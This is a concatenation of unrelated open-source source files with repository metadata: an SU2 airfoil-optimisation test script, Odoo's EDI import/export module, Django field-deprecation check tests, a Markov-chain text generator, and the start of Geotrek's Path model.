with SU2.io.redirect_folder(folder='JOB_001',link='mesh_NACA0012.su2'):
func = SU2.eval.func( 'LIFT', config, state )
grads = SU2.eval.grad( 'LIFT', 'CONTINUOUS_ADJOINT', config, state )
with SU2.io.redirect_folder(folder='JOB_001',link='mesh_NACA0012.su2'):
func = SU2.eval.func( 'DRAG', config, state ) # will not run direct
grads = SU2.eval.grad( 'LIFT', 'CONTINUOUS_ADJOINT', config, state ) # will not run adjoint
grads = SU2.eval.grad( 'DRAG', 'CONTINUOUS_ADJOINT', config, state ) # will run adjoint
wait = 0
def level3():
folder='test_level3'; pull='config_NACA0012.cfg'; link='mesh_NACA0012.su2'
with SU2.io.redirect_folder(folder,pull,link):
# Setup
config_name = 'config_NACA0012.cfg'
config = SU2.io.Config(config_name)
config['NUMBER_PART'] = 2
config['EXT_ITER'] = 9
# initialize design state
state = SU2.io.State()
state.find_files(config)
# start design
design = SU2.eval.Design(config,state)
# run design with dv change
dv_new = [0.0]*38
vals = design.obj_f(dv_new)
vals = design.obj_df(dv_new)
vals = design.con_ceq(dv_new)
vals = design.con_dceq(dv_new)
vals = design.con_cieq(dv_new)
vals = design.con_dcieq(dv_new)
vals = design.func('LIFT')
vals = design.grad('LIFT','CONTINUOUS_ADJOINT')
SU2.io.save_data('design.pkl',design)
data = SU2.io.load_data('design.pkl')
wait = 0
def level4():
folder='test_level4'; pull='config_NACA0012.cfg'; link='mesh_NACA0012.su2'
with SU2.io.redirect_folder(folder,pull,link):
# Setup
config_name = 'config_NACA0012.cfg'
config = SU2.io.Config(config_name)
config['NUMBER_PART'] = 2
config['EXT_ITER'] = 9
config.CONSOLE = 'QUIET'
# initialize design state
state = SU2.io.State()
state.find_files(config)
# initialize project
project = SU2.opt.Project(config,state)
# run project with dv changes
dv_new = [0.0]*38
vals = project.obj_f(dv_new)
vals = project.obj_df(dv_new)
dv_new = [-0.005]*38
vals = project.obj_f(dv_new)
dv_new = [0.0]*38
dv_new[9] = -0.02
vals = project.obj_f(dv_new)
dv_new = [0.005]*38
vals = project.obj_f(dv_new) # will not rerun solutions
SU2.io.save_data('project.pkl',project)
data = SU2.io.load_data('project.pkl')
data = project.data
wait = 0
print("Done!")
def level5():
folder='test_level5'; pull='config_NACA0012.cfg'; link='mesh_NACA0012.su2'
with SU2.io.redirect_folder(folder,pull,link):
# Setup
config_name = 'config_NACA0012.cfg'
config = SU2.io.Config(config_name)
config['NUMBER_PART'] = 2
config['EXT_ITER'] = 9
config['CONSOLE'] = 'CONCISE'
# set optimization problem
obj = {}
obj['DRAG'] = {'SCALE':1.e-2}
cons = {}
cons['EQUALITY'] = {}
cons['INEQUALITY'] = {}
cons['INEQUALITY']['LIFT'] = {'SIGN':'>','VALUE':0.328188,'SCALE':1e-1}
cons['INEQUALITY']['MOMENT_Z'] = {'SIGN':'>','VALUE':0.034068,'SCALE':1e-2}
def_dv = config.DEFINITION_DV
n_dv = sum(def_dv['KIND'])
def_dv['SCALE'] = [1.e0]*n_dv
config.OPT_OBJECTIVE = obj
config.OPT_CONSTRAINT = cons
# initialize design state
state = SU2.io.State()
state.find_files(config)
# initialize project
project = SU2.opt.Project(config,state)
# optimization setup
x0 = [0.0]*n_dv
xb = [] #[[-0.02,0.02]]*n_dv
its = 20
# optimize
SU2.opt.SLSQP(project,x0,xb,its)
wait = 0
def mesh0():
folder='mesh_level0'; pull='config_NACA0012.cfg'; link='mesh_NACA0012.su2'
with SU2.io.redirect_folder(folder,pull,link):
# Setup
config_name = 'config_NACA0012.cfg'
config = SU2.io.Config(config_name)
config.EXT_ITER = 9
config.NUMBER_PART = 2
SU2.run.CFD(config)
SU2.io.restart2solution(config)
SU2.run.MSH(config)
if __name__ == '__main__':
main()
| lgpl-2.1 | 6,661,521,788,380,340,000 | 27.364742 | 103 | 0.561402 | false |
SCSSG/Odoo-SCS | addons/edi/models/edi.py | 277 | 31944 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (c) 2011-2014 OpenERP S.A. <http://openerp.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import base64
import hashlib
import simplejson as json
import logging
import re
import time
import urllib2
import openerp
import openerp.release as release
from openerp.osv import osv, fields
from openerp.tools.translate import _
from openerp.tools.safe_eval import safe_eval as eval
_logger = logging.getLogger(__name__)
EXTERNAL_ID_PATTERN = re.compile(r'^([^.:]+)(?::([^.]+))?\.(\S+)$')
EDI_VIEW_WEB_URL = '%s/edi/view?db=%s&token=%s'
EDI_PROTOCOL_VERSION = 1 # arbitrary ever-increasing version number
EDI_GENERATOR = 'Odoo' + release.major_version
EDI_GENERATOR_VERSION = release.version_info
def split_external_id(ext_id):
match = EXTERNAL_ID_PATTERN.match(ext_id)
assert match, \
_("'%s' is an invalid external ID") % (ext_id)
return {'module': match.group(1),
'db_uuid': match.group(2),
'id': match.group(3),
'full': match.group(0)}
def safe_unique_id(database_id, model, record_id):
"""Generate a unique string to represent a (database_uuid,model,record_id) pair
without being too long, and with a very low probability of collisions.
"""
msg = "%s-%s-%s-%s" % (time.time(), database_id, model, record_id)
digest = hashlib.sha1(msg).digest()
# fold the sha1 20 bytes digest to 9 bytes
digest = ''.join(chr(ord(x) ^ ord(y)) for (x,y) in zip(digest[:9], digest[9:-2]))
# b64-encode the 9-bytes folded digest to a reasonable 12 chars ASCII ID
digest = base64.urlsafe_b64encode(digest)
return '%s-%s' % (model.replace('.','_'), digest)
def last_update_for(record):
"""Returns the last update timestamp for the given record,
if available, otherwise False
"""
if record._log_access:
record_log = record.get_metadata()[0]
return record_log.get('write_date') or record_log.get('create_date') or False
return False
class edi(osv.AbstractModel):
_name = 'edi.edi'
_description = 'EDI Subsystem'
def new_edi_token(self, cr, uid, record):
"""Return a new, random unique token to identify this model record,
and to be used as token when exporting it as an EDI document.
:param browse_record record: model record for which a token is needed
"""
db_uuid = self.pool.get('ir.config_parameter').get_param(cr, uid, 'database.uuid')
edi_token = hashlib.sha256('%s-%s-%s-%s' % (time.time(), db_uuid, record._name, record.id)).hexdigest()
return edi_token
def serialize(self, edi_documents):
"""Serialize the given EDI document structures (Python dicts holding EDI data),
using JSON serialization.
:param [dict] edi_documents: list of EDI document structures to serialize
:return: UTF-8 encoded string containing the serialized document
"""
serialized_list = json.dumps(edi_documents)
return serialized_list
def generate_edi(self, cr, uid, records, context=None):
"""Generates a final EDI document containing the EDI serialization
of the given records, which should all be instances of a Model
that has the :meth:`~.edi` mixin. The document is not saved in the
database.
:param list(browse_record) records: records to export as EDI
:return: UTF-8 encoded string containing the serialized records
"""
edi_list = []
for record in records:
record_model = record._model
edi_list += record_model.edi_export(cr, uid, [record], context=context)
return self.serialize(edi_list)
def load_edi(self, cr, uid, edi_documents, context=None):
"""Import the given EDI document structures into the system, using
:meth:`~.import_edi`.
:param edi_documents: list of Python dicts containing the deserialized
version of EDI documents
:return: list of (model, id, action) tuple containing the model and database ID
of all records that were imported in the system, plus a suggested
action definition dict for displaying each document.
"""
ir_module = self.pool.get('ir.module.module')
res = []
for edi_document in edi_documents:
module = edi_document.get('__import_module') or edi_document.get('__module')
assert module, 'a `__module` or `__import_module` attribute is required in each EDI document.'
if module != 'base' and not ir_module.search(cr, uid, [('name','=',module),('state','=','installed')]):
raise osv.except_osv(_('Missing Application.'),
_("The document you are trying to import requires the Odoo `%s` application. "
"You can install it by connecting as the administrator and opening the configuration assistant.")%(module,))
model = edi_document.get('__import_model') or edi_document.get('__model')
assert model, 'a `__model` or `__import_model` attribute is required in each EDI document.'
assert model in self.pool, 'model `%s` cannot be found, despite module `%s` being available - '\
'this EDI document seems invalid or unsupported.' % (model,module)
model_obj = self.pool[model]
record_id = model_obj.edi_import(cr, uid, edi_document, context=context)
record_action = model_obj._edi_record_display_action(cr, uid, record_id, context=context)
res.append((model, record_id, record_action))
return res
def deserialize(self, edi_documents_string):
"""Return deserialized version of the given EDI Document string.
:param str|unicode edi_documents_string: UTF-8 string (or unicode) containing
JSON-serialized EDI document(s)
:return: Python object representing the EDI document(s) (usually a list of dicts)
"""
return json.loads(edi_documents_string)
def import_edi(self, cr, uid, edi_document=None, edi_url=None, context=None):
"""Import a JSON serialized EDI Document string into the system, first retrieving it
from the given ``edi_url`` if provided.
:param str|unicode edi: UTF-8 string or unicode containing JSON-serialized
EDI Document to import. Must not be provided if
``edi_url`` is given.
:param str|unicode edi_url: URL where the EDI document (same format as ``edi``)
may be retrieved, without authentication.
"""
if edi_url:
assert not edi_document, 'edi must not be provided if edi_url is given.'
edi_document = urllib2.urlopen(edi_url).read()
assert edi_document, 'EDI Document is empty!'
edi_documents = self.deserialize(edi_document)
return self.load_edi(cr, uid, edi_documents, context=context)
class EDIMixin(object):
"""Mixin class for Model objects that want be exposed as EDI documents.
Classes that inherit from this mixin class should override the
``edi_import()`` and ``edi_export()`` methods to implement their
specific behavior, based on the primitives provided by this mixin."""
def _edi_requires_attributes(self, attributes, edi):
model_name = edi.get('__imported_model') or edi.get('__model') or self._name
for attribute in attributes:
assert edi.get(attribute),\
'Attribute `%s` is required in %s EDI documents.' % (attribute, model_name)
# private method, not RPC-exposed as it creates ir.model.data entries as
# SUPERUSER based on its parameters
def _edi_external_id(self, cr, uid, record, existing_id=None, existing_module=None,
context=None):
"""Generate/Retrieve unique external ID for ``record``.
Each EDI record and each relationship attribute in it is identified by a
unique external ID, which includes the database's UUID, as a way to
refer to any record within any Odoo instance, without conflict.
For Odoo records that have an existing "External ID" (i.e. an entry in
ir.model.data), the EDI unique identifier for this record will be made of
"%s:%s:%s" % (module, database UUID, ir.model.data ID). The database's
UUID MUST NOT contain a colon characters (this is guaranteed by the
UUID algorithm).
For records that have no existing ir.model.data entry, a new one will be
created during the EDI export. It is recommended that the generated external ID
contains a readable reference to the record model, plus a unique value that
hides the database ID. If ``existing_id`` is provided (because it came from
an import), it will be used instead of generating a new one.
If ``existing_module`` is provided (because it came from
an import), it will be used instead of using local values.
:param browse_record record: any browse_record needing an EDI external ID
:param string existing_id: optional existing external ID value, usually coming
from a just-imported EDI record, to be used instead
of generating a new one
:param string existing_module: optional existing module name, usually in the
format ``module:db_uuid`` and coming from a
just-imported EDI record, to be used instead
of local values
:return: the full unique External ID to use for record
"""
ir_model_data = self.pool.get('ir.model.data')
db_uuid = self.pool.get('ir.config_parameter').get_param(cr, uid, 'database.uuid')
ext_id = record.get_external_id()[record.id]
if not ext_id:
ext_id = existing_id or safe_unique_id(db_uuid, record._name, record.id)
# ID is unique cross-db thanks to db_uuid (already included in existing_module)
module = existing_module or "%s:%s" % (record._original_module, db_uuid)
_logger.debug("%s: Generating new external ID `%s.%s` for %r.", self._name,
module, ext_id, record)
ir_model_data.create(cr, openerp.SUPERUSER_ID,
{'name': ext_id,
'model': record._name,
'module': module,
'res_id': record.id})
else:
module, ext_id = ext_id.split('.')
if not ':' in module:
# this record was not previously EDI-imported
if not module == record._original_module:
# this could happen for data records defined in a module that depends
# on the module that owns the model, e.g. purchase defines
# product.pricelist records.
_logger.debug('Mismatching module: expected %s, got %s, for %s.',
module, record._original_module, record)
# ID is unique cross-db thanks to db_uuid
module = "%s:%s" % (module, db_uuid)
return '%s.%s' % (module, ext_id)
def _edi_record_display_action(self, cr, uid, id, context=None):
"""Returns an appropriate action definition dict for displaying
the record with ID ``rec_id``.
:param int id: database ID of record to display
:return: action definition dict
"""
return {'type': 'ir.actions.act_window',
'view_mode': 'form,tree',
'view_type': 'form',
'res_model': self._name,
'res_id': id}
def edi_metadata(self, cr, uid, records, context=None):
"""Return a list containing the boilerplate EDI structures for
exporting ``records`` as EDI, including
the metadata fields
The metadata fields always include::
{
'__model': 'some.model', # record model
'__module': 'module', # require module
'__id': 'module:db-uuid:model.id', # unique global external ID for the record
'__last_update': '2011-01-01 10:00:00', # last update date in UTC!
'__version': 1, # EDI spec version
'__generator' : 'Odoo', # EDI generator
'__generator_version' : [6,1,0], # server version, to check compatibility.
'__attachments_':
}
:param list(browse_record) records: records to export
:return: list of dicts containing boilerplate EDI metadata for each record,
at the corresponding index from ``records``.
"""
ir_attachment = self.pool.get('ir.attachment')
results = []
for record in records:
ext_id = self._edi_external_id(cr, uid, record, context=context)
edi_dict = {
'__id': ext_id,
'__last_update': last_update_for(record),
'__model' : record._name,
'__module' : record._original_module,
'__version': EDI_PROTOCOL_VERSION,
'__generator': EDI_GENERATOR,
'__generator_version': EDI_GENERATOR_VERSION,
}
attachment_ids = ir_attachment.search(cr, uid, [('res_model','=', record._name), ('res_id', '=', record.id)])
if attachment_ids:
attachments = []
for attachment in ir_attachment.browse(cr, uid, attachment_ids, context=context):
attachments.append({
'name' : attachment.name,
'content': attachment.datas, # already base64 encoded!
'file_name': attachment.datas_fname,
})
edi_dict.update(__attachments=attachments)
results.append(edi_dict)
return results
def edi_m2o(self, cr, uid, record, context=None):
"""Return a m2o EDI representation for the given record.
The EDI format for a many2one is::
['unique_external_id', 'Document Name']
"""
edi_ext_id = self._edi_external_id(cr, uid, record, context=context)
relation_model = record._model
name = relation_model.name_get(cr, uid, [record.id], context=context)
name = name and name[0][1] or False
return [edi_ext_id, name]
def edi_o2m(self, cr, uid, records, edi_struct=None, context=None):
"""Return a list representing a O2M EDI relationship containing
all the given records, according to the given ``edi_struct``.
This is basically the same as exporting all the record using
:meth:`~.edi_export` with the given ``edi_struct``, and wrapping
the results in a list.
Example::
[ # O2M fields would be a list of dicts, with their
{ '__id': 'module:db-uuid.id', # own __id.
'__last_update': 'iso date', # update date
'name': 'some name',
#...
},
# ...
],
"""
result = []
for record in records:
result += record._model.edi_export(cr, uid, [record], edi_struct=edi_struct, context=context)
return result
def edi_m2m(self, cr, uid, records, context=None):
"""Return a list representing a M2M EDI relationship directed towards
all the given records.
This is basically the same as exporting all the record using
:meth:`~.edi_m2o` and wrapping the results in a list.
Example::
# M2M fields are exported as a list of pairs, like a list of M2O values
[
['module:db-uuid.id1', 'Task 01: bla bla'],
['module:db-uuid.id2', 'Task 02: bla bla']
]
"""
return [self.edi_m2o(cr, uid, r, context=context) for r in records]
def edi_export(self, cr, uid, records, edi_struct=None, context=None):
"""Returns a list of dicts representing EDI documents containing the
records, and matching the given ``edi_struct``, if provided.
:param edi_struct: if provided, edi_struct should be a dictionary
with a skeleton of the fields to export.
Basic fields can have any key as value, but o2m
values should have a sample skeleton dict as value,
to act like a recursive export.
For example, for a res.partner record::
edi_struct: {
'name': True,
'company_id': True,
'address': {
'name': True,
'street': True,
}
}
Any field not specified in the edi_struct will not
be included in the exported data. Fields with no
value (False) will be omitted in the EDI struct.
If edi_struct is omitted, no fields will be exported
"""
if edi_struct is None:
edi_struct = {}
fields_to_export = edi_struct.keys()
results = []
for record in records:
edi_dict = self.edi_metadata(cr, uid, [record], context=context)[0]
for field_name in fields_to_export:
field = self._fields[field_name]
value = getattr(record, field_name)
if not value and value not in ('', 0):
continue
elif field.type == 'many2one':
value = self.edi_m2o(cr, uid, value, context=context)
elif field.type == 'many2many':
value = self.edi_m2m(cr, uid, value, context=context)
elif field.type == 'one2many':
value = self.edi_o2m(cr, uid, value, edi_struct=edi_struct.get(field_name, {}), context=context)
edi_dict[field_name] = value
results.append(edi_dict)
return results
def _edi_get_object_by_name(self, cr, uid, name, model_name, context=None):
model = self.pool[model_name]
search_results = model.name_search(cr, uid, name, operator='=', context=context)
if len(search_results) == 1:
return model.browse(cr, uid, search_results[0][0], context=context)
return False
def _edi_generate_report_attachment(self, cr, uid, record, context=None):
"""Utility method to generate the first PDF-type report declared for the
current model with ``usage`` attribute set to ``default``.
This must be called explicitly by models that need it, usually
at the beginning of ``edi_export``, before the call to ``super()``."""
ir_actions_report = self.pool.get('ir.actions.report.xml')
matching_reports = ir_actions_report.search(cr, uid, [('model','=',self._name),
('report_type','=','pdf'),
('usage','=','default')])
if matching_reports:
report = ir_actions_report.browse(cr, uid, matching_reports[0])
result, format = openerp.report.render_report(cr, uid, [record.id], report.report_name, {'model': self._name}, context=context)
eval_context = {'time': time, 'object': record}
if not report.attachment or not eval(report.attachment, eval_context):
# no auto-saving of report as attachment, need to do it manually
result = base64.b64encode(result)
file_name = record.name_get()[0][1]
file_name = re.sub(r'[^a-zA-Z0-9_-]', '_', file_name)
file_name += ".pdf"
self.pool.get('ir.attachment').create(cr, uid,
{
'name': file_name,
'datas': result,
'datas_fname': file_name,
'res_model': self._name,
'res_id': record.id,
'type': 'binary'
},
context=context)
def _edi_import_attachments(self, cr, uid, record_id, edi, context=None):
ir_attachment = self.pool.get('ir.attachment')
for attachment in edi.get('__attachments', []):
# check attachment data is non-empty and valid
file_data = None
try:
file_data = base64.b64decode(attachment.get('content'))
except TypeError:
pass
assert file_data, 'Incorrect/Missing attachment file content.'
assert attachment.get('name'), 'Incorrect/Missing attachment name.'
assert attachment.get('file_name'), 'Incorrect/Missing attachment file name.'
assert attachment.get('file_name'), 'Incorrect/Missing attachment file name.'
ir_attachment.create(cr, uid, {'name': attachment['name'],
'datas_fname': attachment['file_name'],
'res_model': self._name,
'res_id': record_id,
# should be pure 7bit ASCII
'datas': str(attachment['content']),
}, context=context)
def _edi_get_object_by_external_id(self, cr, uid, external_id, model, context=None):
"""Returns browse_record representing object identified by the model and external_id,
or None if no record was found with this external id.
:param external_id: fully qualified external id, in the EDI form
``module:db_uuid:identifier``.
:param model: model name the record belongs to.
"""
ir_model_data = self.pool.get('ir.model.data')
# external_id is expected to have the form: ``module:db_uuid:model.random_name``
ext_id_members = split_external_id(external_id)
db_uuid = self.pool.get('ir.config_parameter').get_param(cr, uid, 'database.uuid')
module = ext_id_members['module']
ext_id = ext_id_members['id']
modules = []
ext_db_uuid = ext_id_members['db_uuid']
if ext_db_uuid:
modules.append('%s:%s' % (module, ext_id_members['db_uuid']))
if ext_db_uuid is None or ext_db_uuid == db_uuid:
# local records may also be registered without the db_uuid
modules.append(module)
data_ids = ir_model_data.search(cr, uid, [('model','=',model),
('name','=',ext_id),
('module','in',modules)])
if data_ids:
model = self.pool[model]
data = ir_model_data.browse(cr, uid, data_ids[0], context=context)
if model.exists(cr, uid, [data.res_id]):
return model.browse(cr, uid, data.res_id, context=context)
# stale external-id, cleanup to allow re-import, as the corresponding record is gone
ir_model_data.unlink(cr, 1, [data_ids[0]])
def edi_import_relation(self, cr, uid, model, value, external_id, context=None):
"""Imports a M2O/M2M relation EDI specification ``[external_id,value]`` for the
given model, returning the corresponding database ID:
* First, checks if the ``external_id`` is already known, in which case the corresponding
database ID is directly returned, without doing anything else;
* If the ``external_id`` is unknown, attempts to locate an existing record
with the same ``value`` via name_search(). If found, the given external_id will
be assigned to this local record (in addition to any existing one)
* If previous steps gave no result, create a new record with the given
value in the target model, assign it the given external_id, and return
the new database ID
:param str value: display name of the record to import
:param str external_id: fully-qualified external ID of the record
:return: database id of newly-imported or pre-existing record
"""
_logger.debug("%s: Importing EDI relationship [%r,%r]", model, external_id, value)
target = self._edi_get_object_by_external_id(cr, uid, external_id, model, context=context)
need_new_ext_id = False
if not target:
_logger.debug("%s: Importing EDI relationship [%r,%r] - ID not found, trying name_get.",
self._name, external_id, value)
target = self._edi_get_object_by_name(cr, uid, value, model, context=context)
need_new_ext_id = True
if not target:
_logger.debug("%s: Importing EDI relationship [%r,%r] - name not found, creating it.",
self._name, external_id, value)
# also need_new_ext_id here, but already been set above
model = self.pool[model]
res_id, _ = model.name_create(cr, uid, value, context=context)
target = model.browse(cr, uid, res_id, context=context)
else:
_logger.debug("%s: Importing EDI relationship [%r,%r] - record already exists with ID %s, using it",
self._name, external_id, value, target.id)
if need_new_ext_id:
ext_id_members = split_external_id(external_id)
# module name is never used bare when creating ir.model.data entries, in order
# to avoid being taken as part of the module's data, and cleanup up at next update
module = "%s:%s" % (ext_id_members['module'], ext_id_members['db_uuid'])
# create a new ir.model.data entry for this value
self._edi_external_id(cr, uid, target, existing_id=ext_id_members['id'], existing_module=module, context=context)
return target.id
def edi_import(self, cr, uid, edi, context=None):
"""Imports a dict representing an EDI document into the system.
:param dict edi: EDI document to import
:return: the database ID of the imported record
"""
assert self._name == edi.get('__import_model') or \
('__import_model' not in edi and self._name == edi.get('__model')), \
"EDI Document Model and current model do not match: '%s' (EDI) vs '%s' (current)." % \
(edi.get('__model'), self._name)
# First check the record is now already known in the database, in which case it is ignored
ext_id_members = split_external_id(edi['__id'])
existing = self._edi_get_object_by_external_id(cr, uid, ext_id_members['full'], self._name, context=context)
if existing:
_logger.info("'%s' EDI Document with ID '%s' is already known, skipping import!", self._name, ext_id_members['full'])
return existing.id
record_values = {}
o2m_todo = {} # o2m values are processed after their parent already exists
for field_name, field_value in edi.iteritems():
# skip metadata and empty fields
if field_name.startswith('__') or field_value is None or field_value is False:
continue
field = self._fields.get(field_name)
if not field:
_logger.warning('Ignoring unknown field `%s` when importing `%s` EDI document.', field_name, self._name)
continue
# skip function/related fields
if not field.store:
_logger.warning("Unexpected function field value is found in '%s' EDI document: '%s'." % (self._name, field_name))
continue
relation_model = field.comodel_name
if field.type == 'many2one':
record_values[field_name] = self.edi_import_relation(cr, uid, relation_model,
field_value[1], field_value[0],
context=context)
elif field.type == 'many2many':
record_values[field_name] = [self.edi_import_relation(cr, uid, relation_model, m2m_value[1],
m2m_value[0], context=context)
for m2m_value in field_value]
elif field.type == 'one2many':
# must wait until parent report is imported, as the parent relationship
# is often required in o2m child records
o2m_todo[field_name] = field_value
else:
record_values[field_name] = field_value
module_ref = "%s:%s" % (ext_id_members['module'], ext_id_members['db_uuid'])
record_id = self.pool.get('ir.model.data')._update(cr, uid, self._name, module_ref, record_values,
xml_id=ext_id_members['id'], context=context)
record_display, = self.name_get(cr, uid, [record_id], context=context)
# process o2m values, connecting them to their parent on-the-fly
for o2m_field, o2m_value in o2m_todo.iteritems():
field = self._fields[o2m_field]
dest_model = self.pool[field.comodel_name]
dest_field = field.inverse_name
for o2m_line in o2m_value:
# link to parent record: expects an (ext_id, name) pair
o2m_line[dest_field] = (ext_id_members['full'], record_display[1])
dest_model.edi_import(cr, uid, o2m_line, context=context)
# process the attachments, if any
self._edi_import_attachments(cr, uid, record_id, edi, context=context)
return record_id
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -5,793,261,309,824,443,000 | 51.712871 | 139 | 0.557726 | false |
RossBrunton/django | tests/check_framework/test_model_field_deprecation.py | 322 | 2584 | from django.core import checks
from django.db import models
from django.test import SimpleTestCase
from .tests import IsolateModelsMixin
class TestDeprecatedField(IsolateModelsMixin, SimpleTestCase):
def test_default_details(self):
class MyField(models.Field):
system_check_deprecated_details = {}
class Model(models.Model):
name = MyField()
model = Model()
self.assertEqual(model.check(), [
checks.Warning(
msg='MyField has been deprecated.',
hint=None,
obj=Model._meta.get_field('name'),
id='fields.WXXX',
)
])
def test_user_specified_details(self):
class MyField(models.Field):
system_check_deprecated_details = {
'msg': 'This field is deprecated and will be removed soon.',
'hint': 'Use something else.',
'id': 'fields.W999',
}
class Model(models.Model):
name = MyField()
model = Model()
self.assertEqual(model.check(), [
checks.Warning(
msg='This field is deprecated and will be removed soon.',
hint='Use something else.',
obj=Model._meta.get_field('name'),
id='fields.W999',
)
])
class TestRemovedField(IsolateModelsMixin, SimpleTestCase):
def test_default_details(self):
class MyField(models.Field):
system_check_removed_details = {}
class Model(models.Model):
name = MyField()
model = Model()
self.assertEqual(model.check(), [
checks.Error(
msg='MyField has been removed except for support in historical migrations.',
hint=None,
obj=Model._meta.get_field('name'),
id='fields.EXXX',
)
])
def test_user_specified_details(self):
class MyField(models.Field):
system_check_removed_details = {
'msg': 'Support for this field is gone.',
'hint': 'Use something else.',
'id': 'fields.E999',
}
class Model(models.Model):
name = MyField()
model = Model()
self.assertEqual(model.check(), [
checks.Error(
msg='Support for this field is gone.',
hint='Use something else.',
obj=Model._meta.get_field('name'),
id='fields.E999',
)
])
| bsd-3-clause | -2,592,567,449,084,340,700 | 29.4 | 92 | 0.522059 | false |
elemson/codeacademyfinalproj | cc_markov.py | 4 | 2430 | import re
import random
from collections import defaultdict, deque
"""
Codecademy Pro Final Project supplementary code
Markov Chain generator
This is a text generator that uses Markov Chains to generate text
using a uniform distribution.
num_key_words is the number of words that compose a key (suggested: 2 or 3)
"""
class MarkovChain:
def __init__(self, num_key_words=2):
self.num_key_words = num_key_words
self.lookup_dict = defaultdict(list)
self._punctuation_regex = re.compile('[,.!;\?\:\-\[\]\n]+')
self._seeded = False
self.__seed_me()
def __seed_me(self, rand_seed=None):
if self._seeded is not True:
try:
if rand_seed is not None:
random.seed(rand_seed)
else:
random.seed()
self._seeded = True
except NotImplementedError:
self._seeded = False
"""
" Build Markov Chain from data source.
" Use add_file() or add_string() to add the appropriate format source
"""
def add_file(self, file_path):
content = ''
with open(file_path, 'r') as fh:
self.__add_source_data(fh.read())
def add_string(self, str):
self.__add_source_data(str)
def __add_source_data(self, str):
clean_str = self._punctuation_regex.sub(' ', str).lower()
tuples = self.__generate_tuple_keys(clean_str.split())
for t in tuples:
self.lookup_dict[t[0]].append(t[1])
def __generate_tuple_keys(self, data):
if len(data) < self.num_key_words:
return
for i in xrange(len(data) - self.num_key_words):
yield [ tuple(data[i:i+self.num_key_words]), data[i+self.num_key_words] ]
"""
" Generates text based on the data the Markov Chain contains
" max_length is the maximum number of words to generate
"""
def generate_text(self, max_length=20):
context = deque()
output = []
if len(self.lookup_dict) > 0:
self.__seed_me(rand_seed=len(self.lookup_dict))
idx = random.randint(0, len(self.lookup_dict)-1)
chain_head = list(self.lookup_dict.keys()[idx])
context.extend(chain_head)
while len(output) < (max_length - self.num_key_words):
next_choices = self.lookup_dict[tuple(context)]
if len(next_choices) > 0:
next_word = random.choice(next_choices)
context.append(next_word)
output.append(context.popleft())
else:
break
output.extend(list(context))
return output
| gpl-2.0 | -7,707,940,413,404,563,000 | 28.277108 | 79 | 0.631276 | false |
Anaethelion/Geotrek | geotrek/core/models.py | 1 | 20663 | # -*- coding: utf-8 -*-
import logging
import functools
from django.contrib.gis.db import models
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
from django.contrib.gis.geos import fromstr, LineString
from mapentity.models import MapEntityMixin
from geotrek.authent.models import StructureRelated
from geotrek.common.mixins import (TimeStampedModelMixin, NoDeleteMixin,
AddPropertyMixin)
from geotrek.common.utils import classproperty
from geotrek.common.utils.postgresql import debug_pg_notices
from geotrek.altimetry.models import AltimetryMixin
from .helpers import PathHelper, TopologyHelper
from django.db import connections, DEFAULT_DB_ALIAS
logger = logging.getLogger(__name__)
class PathManager(models.GeoManager):
# Use this manager when walking through FK/M2M relationships
use_for_related_fields = True
def get_queryset(self):
"""Hide all ``Path`` records that are not marked as visible.
"""
return super(PathManager, self).get_queryset().filter(visible=True)
# GeoDjango note:
# Django automatically creates indexes on geometry fields but it uses a
# syntax which is not compatible with PostGIS 2.0. That's why index creation
# is explicitly disbaled here (see manual index creation in custom SQL files).
class Path(AddPropertyMixin, MapEntityMixin, AltimetryMixin,
TimeStampedModelMixin, StructureRelated):
geom = models.LineStringField(srid=settings.SRID, spatial_index=False)
geom_cadastre = models.LineStringField(null=True, srid=settings.SRID, spatial_index=False,
editable=False)
valid = models.BooleanField(db_column='valide', default=True, verbose_name=_(u"Validity"),
help_text=_(u"Approved by manager"))
visible = models.BooleanField(db_column='visible', default=True, verbose_name=_(u"Visible"),
help_text=_(u"Shown in lists and maps"))
name = models.CharField(null=True, blank=True, max_length=20, db_column='nom', verbose_name=_(u"Name"),
help_text=_(u"Official name"))
comments = models.TextField(null=True, blank=True, db_column='remarques', verbose_name=_(u"Comments"),
help_text=_(u"Remarks"))
departure = models.CharField(null=True, blank=True, default="", max_length=250, db_column='depart', verbose_name=_(u"Departure"),
help_text=_(u"Departure place"))
arrival = models.CharField(null=True, blank=True, default="", max_length=250, db_column='arrivee', verbose_name=_(u"Arrival"),
help_text=_(u"Arrival place"))
comfort = models.ForeignKey('Comfort',
null=True, blank=True, related_name='paths',
verbose_name=_("Comfort"), db_column='confort')
source = models.ForeignKey('PathSource',
null=True, blank=True, related_name='paths',
verbose_name=_("Source"), db_column='source')
stake = models.ForeignKey('Stake',
null=True, blank=True, related_name='paths',
verbose_name=_("Maintenance stake"), db_column='enjeu')
usages = models.ManyToManyField('Usage',
blank=True, null=True, related_name="paths",
verbose_name=_(u"Usages"), db_table="l_r_troncon_usage")
networks = models.ManyToManyField('Network',
blank=True, null=True, related_name="paths",
verbose_name=_(u"Networks"), db_table="l_r_troncon_reseau")
eid = models.CharField(verbose_name=_(u"External id"), max_length=128, blank=True, db_column='id_externe')
objects = PathManager()
is_reversed = False
@property
def length_2d(self):
if self.geom:
return round(self.geom.length, 1)
else:
return None
@classproperty
def length_2d_verbose_name(cls):
return _(u"2D Length")
@property
def length_2d_display(self):
return self.length_2d
def __unicode__(self):
return self.name or _('path %d') % self.pk
class Meta:
db_table = 'l_t_troncon'
verbose_name = _(u"Path")
verbose_name_plural = _(u"Paths")
@classmethod
def closest(cls, point):
"""
Returns the closest path of the point.
Will fail if no path in database.
"""
# TODO: move to custom manager
if point.srid != settings.SRID:
point = point.transform(settings.SRID, clone=True)
return cls.objects.all().distance(point).order_by('distance')[0]
def is_overlap(self):
return not PathHelper.disjoint(self.geom, self.pk)
def reverse(self):
"""
Reverse the geometry.
We keep track of this, since we will have to work on topologies at save()
"""
